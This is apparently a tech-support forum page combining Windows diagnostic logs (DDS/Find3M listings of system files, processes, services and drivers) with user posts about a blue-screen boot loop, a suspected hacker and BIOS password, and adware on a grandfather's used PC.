==================== Find3M ====================
.
2015-07-05 10:08:23 300704 ------w- C:\Windows\System32\MpSigStub.exe
2015-07-05 05:54:57 113880 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2015-06-18 15:41:56 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2015-06-18 15:41:44 109272 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2015-06-18 15:41:40 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2015-05-25 18:24:00 5569984 ----a-w- C:\Windows\System32\ntoskrnl.exe
2015-05-25 18:23:59 95680 ----a-w- C:\Windows\System32\drivers\ksecdd.sys
2015-05-25 18:23:59 155584 ----a-w- C:\Windows\System32\drivers\ksecpkg.sys
2015-05-25 18:21:21 1728960 ----a-w- C:\Windows\System32\ntdll.dll
2015-05-25 18:18:56 43520 ----a-w- C:\Windows\System32\csrsrv.dll
2015-05-25 18:18:56 22016 ----a-w- C:\Windows\System32\credssp.dll
2015-05-25 18:18:54 879104 ----a-w- C:\Windows\System32\advapi32.dll
2015-05-25 18:18:45 47104 ----a-w- C:\Windows\System32\typeperf.exe
2015-05-25 18:18:45 404992 ----a-w- C:\Windows\System32\tracerpt.exe
2015-05-25 18:18:39 112640 ----a-w- C:\Windows\System32\smss.exe
2015-05-25 18:18:32 296960 ----a-w- C:\Windows\System32\rstrui.exe
2015-05-25 18:18:30 43008 ----a-w- C:\Windows\System32\relog.exe
2015-05-25 18:18:19 31232 ----a-w- C:\Windows\System32\lsass.exe
2015-05-25 18:18:19 104448 ----a-w- C:\Windows\System32\logman.exe
2015-05-25 18:18:11 19456 ----a-w- C:\Windows\System32\diskperf.exe
2015-05-25 18:18:08 338432 ----a-w- C:\Windows\System32\conhost.exe
2015-05-25 18:18:04 64000 ----a-w- C:\Windows\System32\auditpol.exe
2015-05-25 18:14:26 60416 ----a-w- C:\Windows\System32\msobjs.dll
2015-05-25 18:14:04 146432 ----a-w- C:\Windows\System32\msaudite.dll
2015-05-25 18:07:34 3989440 ----a-w- C:\Windows\SysWow64\ntkrnlpa.exe
2015-05-25 18:07:34 3934144 ----a-w- C:\Windows\SysWow64\ntoskrnl.exe
2015-05-25 18:04:08 1310744 ----a-w- C:\Windows\SysWow64\ntdll.dll
2015-05-25 18:00:44 40448 ----a-w- C:\Windows\SysWow64\typeperf.exe
2015-05-25 18:00:40 364544 ----a-w- C:\Windows\SysWow64\tracerpt.exe
2015-05-25 18:00:28 25600 ----a-w- C:\Windows\SysWow64\setup16.exe
2015-05-25 18:00:25 37888 ----a-w- C:\Windows\SysWow64\relog.exe
2015-05-25 18:00:17 82944 ----a-w- C:\Windows\SysWow64\logman.exe
2015-05-25 18:00:09 17408 ----a-w- C:\Windows\SysWow64\diskperf.exe
2015-05-25 18:00:04 50176 ----a-w- C:\Windows\SysWow64\auditpol.exe
2015-05-25 17:59:52 96768 ----a-w- C:\Windows\SysWow64\sspicli.dll
2015-05-25 17:59:52 5120 ----a-w- C:\Windows\SysWow64\wow32.dll
2015-05-25 17:59:51 274944 ----a-w- C:\Windows\SysWow64\KernelBase.dll
2015-05-25 17:57:31 60416 ----a-w- C:\Windows\SysWow64\msobjs.dll
2015-05-25 17:57:15 146432 ----a-w- C:\Windows\SysWow64\msaudite.dll
2015-05-25 17:00:56 36864 ----a-w- C:\Windows\System32\UtcResources.dll
2015-05-25 16:50:38 7680 ----a-w- C:\Windows\SysWow64\instnm.exe
2015-05-25 16:50:36 2048 ----a-w- C:\Windows\SysWow64\user.exe
2015-05-25 16:48:25 6144 ---ha-w- C:\Windows\SysWow64\api-ms-win-security-base-l1-1-0.dll
2015-05-25 16:48:25 4608 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-25 16:48:25 3584 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-xstate-l1-1-0.dll
2015-05-25 16:48:25 3072 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-util-l1-1-0.dll
2015-05-23 03:28:17 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2015-05-23 03:15:54 503808 ----a-w- C:\Windows\SysWow64\vbscript.dll
2015-05-23 03:15:40 62464 ----a-w- C:\Windows\SysWow64\iesetup.dll
2015-05-23 03:15:02 47616 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2015-05-23 03:14:51 341504 ----a-w- C:\Windows\SysWow64\html.iec
2015-05-23 03:13:48 64000 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2015-05-23 03:05:21 115712 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2015-05-23 03:04:50 620032 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2015-05-23 02:52:43 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2015-05-23 02:47:31 4305920 ----a-w- C:\Windows\SysWow64\jscript9.dll
2015-05-23 02:37:45 2052608 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2015-05-23 02:37:25 1155072 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2015-05-23 02:20:35 1950720 ----a-w- C:\Windows\SysWow64\wininet.dll
2015-05-22 19:16:55 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2015-05-22 19:16:44 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2015-05-22 19:01:42 66560 ----a-w- C:\Windows\System32\iesetup.dll
2015-05-22 19:00:54 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2015-05-22 19:00:47 417792 ----a-w- C:\Windows\System32\html.iec
2015-05-22 19:00:25 584192 ----a-w- C:\Windows\System32\vbscript.dll
2015-05-22 18:59:27 88064 ----a-w- C:\Windows\System32\MshtmlDac.dll
2015-05-22 18:52:21 6026240 ----a-w- C:\Windows\System32\jscript9.dll
2015-05-22 18:47:49 144384 ----a-w- C:\Windows\System32\ieUnatt.exe
2015-05-22 18:47:34 114688 ----a-w- C:\Windows\System32\ieetwcollector.exe
2015-05-22 18:47:03 814080 ----a-w- C:\Windows\System32\jscript9diag.dll
2015-05-22 18:40:17 968704 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2015-05-22 18:29:31 77824 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2015-05-22 18:05:28 1359360 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2015-05-22 18:05:06 2125824 ----a-w- C:\Windows\System32\inetcpl.cpl
2015-05-22 17:50:20 2426880 ----a-w- C:\Windows\System32\wininet.dll
2015-05-09 03:27:37 98304 ----a-w- C:\Windows\System32\wudriver.dll
2015-05-09 03:27:37 3147776 ----a-w- C:\Windows\System32\wucltux.dll
2015-05-09 03:27:37 191488 ----a-w- C:\Windows\System32\wuwebv.dll
2015-05-09 03:26:38 87040 ----a-w- C:\Windows\System32\WinSetupUI.dll
2015-05-09 03:26:30 12288 ----a-w- C:\Windows\System32\wu.upgrade.ps.dll
2015-05-09 03:26:27 36864 ----a-w- C:\Windows\System32\wuapp.exe
2015-05-09 03:14:46 92672 ----a-w- C:\Windows\SysWow64\wudriver.dll
2015-05-09 03:14:46 173056 ----a-w- C:\Windows\SysWow64\wuwebv.dll
2015-05-09 03:13:32 33792 ----a-w- C:\Windows\SysWow64\wuapp.exe
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\msdxm.ocx
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\dxmasf.dll
2015-04-29 18:21:46 9728 ----a-w- C:\Windows\System32\spwmp.dll
2015-04-29 18:19:43 12625920 ----a-w- C:\Windows\System32\wmploc.DLL
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\msdxm.ocx
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\dxmasf.dll
2015-04-29 18:07:07 8192 ----a-w- C:\Windows\SysWow64\spwmp.dll
2015-04-29 18:05:19 12625408 ----a-w- C:\Windows\SysWow64\wmploc.DLL
2015-04-27 19:23:45 229376 ----a-w- C:\Windows\System32\wintrust.dll
2015-04-27 19:23:13 188416 ----a-w- C:\Windows\System32\cryptsvc.dll
2015-04-27 19:23:13 140288 ----a-w- C:\Windows\System32\cryptnet.dll
2015-04-27 19:05:58 179200 ----a-w- C:\Windows\SysWow64\wintrust.dll
2015-04-27 19:04:37 143872 ----a-w- C:\Windows\SysWow64\cryptsvc.dll
2015-04-27 19:04:37 1174528 ----a-w- C:\Windows\SysWow64\crypt32.dll
2015-04-27 19:04:37 103936 ----a-w- C:\Windows\SysWow64\cryptnet.dll
2015-04-24 18:17:26 633856 ----a-w- C:\Windows\System32\comctl32.dll
.
============= FINISH: 14:17:16.38 ===============

Attached Files
File Type: txt attach.txt (12.2 KB)

Help!!!!! Please!!!!!

I'm trying to start my computer, but as soon as I turn it on, it constantly says "Your PC ran into a problem, and needs to restart. We are just collecting some error info, and then we will restart for you." But it won't go past 0%. It then goes to "preparing automatic repair" and nothing happens; it just goes back to the blue screen. It's constantly doing this. :huh:

Virus \ Hacker in my computer? please help!

Hello, I'll start from the beginning, and sorry if I make writing mistakes, because English is not my mother language.
So I bought a CD key for a game from a legit site, and they gave me a link to get my CD key, from which I got an error that I'm using a proxy (I don't know what a proxy or VPN is; I'm not an expert in computers). I contacted them and they said that I'm using a proxy VPN. Anyway, I resolved it afterwards, they just gave me the CD key, but after that I searched on Google about proxy, VPN, and I got onto a site called whatismyproxy, which says:
Browser: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Server : Apache
Your internal ip : unknown
Your external ip : (IP) country Romania (which I am)
This server : (IP) United States, GA Atlanta (no idea why)

OK, after I saw the United States thing I scanned my PC and used anti-malware, but the same thing appeared on that website.

Today I reinstalled my Windows, and what made me panic is that I saw that my BIOS has set a password by itself. I never used a password on the BIOS, and I can say 100% I didn't change it myself by accident, because I would have remembered that.
So, as I said, I'm not an expert on computers, please help!

Typical adware / malware activity

My grandfather recently purchased a used PC from someone. It's running Windows 7 Professional SP1. I think he clicked something he shouldn't have because he is getting a lot of ads in new tabs pertaining to whatever the website he is currently on is about (for example, going to techsupportforum brought ads for computer help). It has changed his home page to Yahoo search and there was an extension on his Chrome called PulseBuy I believe? Or something similar.

I've installed Avast, Comodo, and Malwarebytes and ran scans on each. Avast detected a PUP and Malwarebytes detected over 160 entries. Since running all the scans, he was still getting these pop-ups and Avast was displaying a threat detected pop-up about every 10 seconds. After turning off Java in the browser I've had no more warnings from Avast but I haven't done much browsing outside of coming here to post this.

Required logs below and attached:

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17840
Run by Home 10 at 19:20:43 on 2015-07-09
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.16382.13848 [GMT -7:00]
.
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Comodo Defense+ *Enabled/Updated* {493CE176-EB84-BC8D-9707-B3ACF7598648}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: COMODO Firewall *Enabled* {CA6681B7-87D1-B25B-86E8-21EB720D8B8E}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\COMODO\COMODO Internet Security\CisTray.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\DELL\Dell Laser MFP 1815\LocalSM\jbDetect.exe
C:\Program Files (x86)\DELL\Dell Laser MFP 1815\PSU\Scan2pc.exe
C:\Program Files (x86)\DELL\Dell Laser MFP 1815\PaperPort\pptd40nt.exe
C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
C:\Windows\System32\svchost.exe -k utcsvc
C:\Windows\system32\taskeng.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Browny02\BrYNSvc.exe
C:\Windows\System32\svchost.exe -k secsvcs
C:\Program Files\AVAST Software\Avast\avastui.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Windows\system32\GWX\GWX.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Program Files\COMODO\COMODO Internet Security\cis.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\taskeng.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = Google
mWinlogon: Userinit = userinit.exe,
BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
mRun: [Dell Laser MFP 1815 SM_JB] C:\Program Files (x86)\DELL\Dell Laser MFP 1815\LocalSM\jbDetect.exe
mRun: [MFP1815_S2P] C:\PROGRAM FILES (X86)\DELL\DELL LASER MFP 1815\PSU\Scan2Pc.exe
mRun: [SSBkgdUpdate] "C:\Program Files (x86)\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
mRun: [PaperPort PTD] "C:\Program Files (x86)\DELL\Dell Laser MFP 1815\PaperPort\pptd40nt.exe"
mRun: [IndexSearch] "C:\Program Files (x86)\DELL\Dell Laser MFP 1815\PaperPort\IndexSearch.exe"
mRun: [BrStsMon00] C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe /AUTORUN
mRun: [AvastUI.exe] "C:\Program Files\AVAST Software\Avast\AvastUI.exe" /nogui
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: SoftwareSASGeneration = dword:1
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE/3000
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
Trusted Zone: dell.com
TCP: NameServer = 192.168.0.1
TCP: Interfaces\{62D48FF7-A7AB-46B0-A9DD-D499D2AA3F8A} : NameServer = 156.154.70.22,156.154.71.22
TCP: Interfaces\{62D48FF7-A7AB-46B0-A9DD-D499D2AA3F8A} : DHCPNameServer = 192.168.0.1
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.132\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-mStart Page = Google
x64-BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll
x64-Run: [COMODO Internet Security] C:\Program Files\COMODO\COMODO Internet Security\cistray.exe
x64-SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 aswRvrt;avast! Revert;C:\Windows\System32\drivers\aswRvrt.sys [2015-7-8 65736]
R0 aswVmm;avast! VM Monitor;C:\Windows\System32\drivers\aswVmm.sys [2015-7-8 272248]
R1 aswSnx;aswSnx;C:\Windows\System32\drivers\aswSnx.sys [2015-7-8 1047320]
R1 aswSP;aswSP;C:\Windows\System32\drivers\aswsp.sys [2015-7-8 442264]
R1 cmderd;COMODO Internet Security Eradication Driver;C:\Windows\System32\drivers\cmderd.sys [2015-6-5 20672]
R1 cmdGuard;COMODO Internet Security Sandbox Driver;C:\Windows\System32\drivers\cmdguard.sys [2015-6-5 797256]
R1 cmdHlp;COMODO Internet Security Helper Driver;C:\Windows\System32\drivers\cmdhlp.sys [2015-6-5 45856]
R2 aswHwid;avast! HardwareID;C:\Windows\System32\drivers\aswHwid.sys [2015-7-8 29168]
R2 aswMonFlt;aswMonFlt;C:\Windows\System32\drivers\aswMonFlt.sys [2015-7-8 89944]
R2 aswStm;aswStm;C:\Windows\System32\drivers\aswStm.sys [2015-7-8 137288]
R2 avast! Antivirus;Avast Antivirus;C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2015-7-8 343336]
R2 DiagTrack;Diagnostics Tracking Service;C:\Windows\System32\svchost.exe -k utcsvc [2009-7-13 27136]
R2 SSPORT;SSPORT;C:\Windows\System32\drivers\SSPORT.sys [2006-11-21 11576]
R3 BrYNSvc;BrYNSvc;C:\Program Files (x86)\Browny02\BrYNSvc.exe [2015-4-26 245760]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2015-7-8 25816]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-3-18 138576]
S2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2015-7-8 1133880]
S3 cmdvirth;COMODO Virtual Service Manager;C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2015-6-5 2265792]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2015-6-11 114688]
S3 MBAMWebAccessControl;MBAMWebAccessControl;C:\Windows\System32\drivers\mwac.sys [2015-7-8 63704]
S3 StorSvc;Storage Service;C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-13 27136]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2015-3-27 59392]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2015-3-30 1255736]
.
=============== Created Last 30 ================
.
2015-07-09 06:11:09 -------- d-----w- C:\Users\Home 10\AppData\Local\Diagnostics
2015-07-09 05:32:28 113880 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2015-07-09 05:32:16 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2015-07-09 05:32:16 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2015-07-09 05:32:16 109272 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2015-07-09 05:32:16 -------- d-----w- C:\ProgramData\Malwarebytes
2015-07-09 05:32:16 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-07-09 04:24:43 -------- d-----w- C:\ProgramData\Shared Space
2015-07-09 04:24:32 -------- d-----w- C:\Program Files\COMODO
2015-07-08 19:37:30 -------- d-----w- C:\Users\Home 10\AppData\Roaming\AVAST Software
2015-07-08 19:36:57 89944 ----a-w- C:\Windows\System32\drivers\aswMonFlt.sys
2015-07-08 19:36:57 65736 ----a-w- C:\Windows\System32\drivers\aswRvrt.sys
2015-07-08 19:36:57 29168 ----a-w- C:\Windows\System32\drivers\aswHwid.sys
2015-07-08 19:36:57 272248 ----a-w- C:\Windows\System32\drivers\aswVmm.sys
2015-07-08 19:36:57 137288 ----a-w- C:\Windows\System32\drivers\aswStm.sys
2015-07-08 19:36:56 93528 ----a-w- C:\Windows\System32\drivers\aswRdr2.sys
2015-07-08 19:36:55 1047320 ----a-w- C:\Windows\System32\drivers\aswSnx.sys
2015-07-08 19:36:43 43112 ----a-w- C:\Windows\avastSS.scr
2015-07-08 19:35:43 -------- d-----w- C:\Program Files\AVAST Software
2015-07-08 19:35:05 -------- d-----w- C:\ProgramData\AVAST Software
2015-07-08 19:31:02 12221144 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{C40CDC78-D94B-43E7-9DDD-52AB3D8B59F0}\mpengine.dll
2015-06-11 23:30:56 633856 ----a-w- C:\Windows\System32\comctl32.dll
2015-06-11 23:29:56 69888 ----a-w- C:\Windows\System32\drivers\stream.sys
2015-06-11 23:23:52 -------- d-----w- C:\Users\Home 10\AppData\Local\GWX
2015-06-11 22:43:02 -------- d-----w- C:\Users\Home 10\AppData\Local\Google
.
==================== Find3M ====================
.
2015-06-23 20:30:20 300704 ------w- C:\Windows\System32\MpSigStub.exe
2015-06-05 21:35:52 45856 ----a-w- C:\Windows\System32\drivers\cmdhlp.sys
2015-06-05 21:35:50 797256 ----a-w- C:\Windows\System32\drivers\cmdguard.sys
2015-06-05 21:35:46 20672 ----a-w- C:\Windows\System32\drivers\cmderd.sys
2015-06-05 21:34:26 41224 ----a-w- C:\Windows\System32\cmdcsr.dll
2015-06-05 21:34:20 444448 ----a-w- C:\Windows\SysWow64\guard32.dll
2015-06-05 21:34:16 576824 ----a-w- C:\Windows\System32\guard64.dll
2015-06-05 21:33:20 358080 ----a-w- C:\Windows\System32\cmdvrt64.dll
2015-06-05 21:32:52 45760 ----a-w- C:\Windows\System32\cmdkbd64.dll
2015-06-05 21:31:56 288448 ----a-w- C:\Windows\SysWow64\cmdvrt32.dll
2015-06-05 21:31:28 40640 ----a-w- C:\Windows\SysWow64\cmdkbd32.dll
2015-05-25 18:24:00 5569984 ----a-w- C:\Windows\System32\ntoskrnl.exe
2015-05-25 18:23:59 95680 ----a-w- C:\Windows\System32\drivers\ksecdd.sys
2015-05-25 18:23:59 155584 ----a-w- C:\Windows\System32\drivers\ksecpkg.sys
2015-05-25 18:21:21 1728960 ----a-w- C:\Windows\System32\ntdll.dll
2015-05-25 18:18:56 43520 ----a-w- C:\Windows\System32\csrsrv.dll
2015-05-25 18:18:56 22016 ----a-w- C:\Windows\System32\credssp.dll
2015-05-25 18:18:54 879104 ----a-w- C:\Windows\System32\advapi32.dll
2015-05-25 18:18:45 47104 ----a-w- C:\Windows\System32\typeperf.exe
2015-05-25 18:18:45 404992 ----a-w- C:\Windows\System32\tracerpt.exe
2015-05-25 18:18:39 112640 ----a-w- C:\Windows\System32\smss.exe
2015-05-25 18:18:32 296960 ----a-w- C:\Windows\System32\rstrui.exe
2015-05-25 18:18:30 43008 ----a-w- C:\Windows\System32\relog.exe
2015-05-25 18:18:19 31232 ----a-w- C:\Windows\System32\lsass.exe
2015-05-25 18:18:19 104448 ----a-w- C:\Windows\System32\logman.exe
2015-05-25 18:18:11 19456 ----a-w- C:\Windows\System32\diskperf.exe
2015-05-25 18:18:08 338432 ----a-w- C:\Windows\System32\conhost.exe
2015-05-25 18:18:04 64000 ----a-w- C:\Windows\System32\auditpol.exe
2015-05-25 18:14:26 60416 ----a-w- C:\Windows\System32\msobjs.dll
2015-05-25 18:14:04 146432 ----a-w- C:\Windows\System32\msaudite.dll
2015-05-25 18:07:34 3989440 ----a-w- C:\Windows\SysWow64\ntkrnlpa.exe
2015-05-25 18:07:34 3934144 ----a-w- C:\Windows\SysWow64\ntoskrnl.exe
2015-05-25 18:04:08 1310744 ----a-w- C:\Windows\SysWow64\ntdll.dll
2015-05-25 18:00:44 40448 ----a-w- C:\Windows\SysWow64\typeperf.exe
2015-05-25 18:00:40 364544 ----a-w- C:\Windows\SysWow64\tracerpt.exe
2015-05-25 18:00:28 25600 ----a-w- C:\Windows\SysWow64\setup16.exe
2015-05-25 18:00:25 37888 ----a-w- C:\Windows\SysWow64\relog.exe
2015-05-25 18:00:17 82944 ----a-w- C:\Windows\SysWow64\logman.exe
2015-05-25 18:00:09 17408 ----a-w- C:\Windows\SysWow64\diskperf.exe
2015-05-25 18:00:04 50176 ----a-w- C:\Windows\SysWow64\auditpol.exe
2015-05-25 17:59:52 96768 ----a-w- C:\Windows\SysWow64\sspicli.dll
2015-05-25 17:59:52 5120 ----a-w- C:\Windows\SysWow64\wow32.dll
2015-05-25 17:59:51 274944 ----a-w- C:\Windows\SysWow64\KernelBase.dll
2015-05-25 17:57:31 60416 ----a-w- C:\Windows\SysWow64\msobjs.dll
2015-05-25 17:57:15 146432 ----a-w- C:\Windows\SysWow64\msaudite.dll
2015-05-25 17:08:39 3206144 ----a-w- C:\Windows\System32\win32k.sys
2015-05-25 17:00:56 36864 ----a-w- C:\Windows\System32\UtcResources.dll
2015-05-25 16:50:38 7680 ----a-w- C:\Windows\SysWow64\instnm.exe
2015-05-25 16:50:36 2048 ----a-w- C:\Windows\SysWow64\user.exe
2015-05-25 16:48:25 6144 ---ha-w- C:\Windows\SysWow64\api-ms-win-security-base-l1-1-0.dll
2015-05-25 16:48:25 4608 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-25 16:48:25 3584 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-xstate-l1-1-0.dll
2015-05-25 16:48:25 3072 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-util-l1-1-0.dll
2015-05-23 03:28:17 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2015-05-23 03:15:54 503808 ----a-w- C:\Windows\SysWow64\vbscript.dll
2015-05-23 03:15:40 62464 ----a-w- C:\Windows\SysWow64\iesetup.dll
2015-05-23 03:15:02 47616 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2015-05-23 03:14:51 341504 ----a-w- C:\Windows\SysWow64\html.iec
2015-05-23 03:13:48 64000 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2015-05-23 03:05:21 115712 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2015-05-23 03:04:50 620032 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2015-05-23 02:52:43 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2015-05-23 02:47:31 4305920 ----a-w- C:\Windows\SysWow64\jscript9.dll
2015-05-23 02:37:45 2052608 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2015-05-23 02:37:25 1155072 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2015-05-23 02:20:35 1950720 ----a-w- C:\Windows\SysWow64\wininet.dll
2015-05-22 19:16:55 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2015-05-22 19:16:44 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2015-05-22 19:01:42 66560 ----a-w- C:\Windows\System32\iesetup.dll
2015-05-22 19:00:54 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2015-05-22 19:00:47 417792 ----a-w- C:\Windows\System32\html.iec
2015-05-22 19:00:25 584192 ----a-w- C:\Windows\System32\vbscript.dll
2015-05-22 18:59:27 88064 ----a-w- C:\Windows\System32\MshtmlDac.dll
2015-05-22 18:52:21 6026240 ----a-w- C:\Windows\System32\jscript9.dll
2015-05-22 18:47:49 144384 ----a-w- C:\Windows\System32\ieUnatt.exe
2015-05-22 18:47:34 114688 ----a-w- C:\Windows\System32\ieetwcollector.exe
2015-05-22 18:47:03 814080 ----a-w- C:\Windows\System32\jscript9diag.dll
2015-05-22 18:40:17 968704 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2015-05-22 18:29:31 77824 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2015-05-22 18:18:41 700416 ----a-w- C:\Windows\System32\generaltel.dll
2015-05-22 18:18:29 757248 ----a-w- C:\Windows\System32\invagent.dll
2015-05-22 18:18:24 423424 ----a-w- C:\Windows\System32\devinv.dll
2015-05-22 18:18:22 1021440 ----a-w- C:\Windows\System32\appraiser.dll
2015-05-22 18:18:21 45568 ----a-w- C:\Windows\System32\acmigration.dll
2015-05-22 18:18:21 227328 ----a-w- C:\Windows\System32\aepdu.dll
2015-05-22 18:13:03 1119232 ----a-w- C:\Windows\System32\aeinv.dll
2015-05-22 18:05:28 1359360 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2015-05-22 18:05:06 2125824 ----a-w- C:\Windows\System32\inetcpl.cpl
2015-05-22 17:50:20 2426880 ----a-w- C:\Windows\System32\wininet.dll
2015-05-21 13:19:52 193536 ----a-w- C:\Windows\System32\aepic.dll
2015-05-01 13:17:03 124112 ----a-w- C:\Windows\System32\PresentationCFFRasterizerNative_v0300.dll
2015-05-01 13:16:41 102608 ----a-w- C:\Windows\SysWow64\PresentationCFFRasterizerNative_v0300.dll
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\msdxm.ocx
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\dxmasf.dll
2015-04-29 18:21:46 9728 ----a-w- C:\Windows\System32\spwmp.dll
2015-04-29 18:19:43 12625920 ----a-w- C:\Windows\System32\wmploc.DLL
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\msdxm.ocx
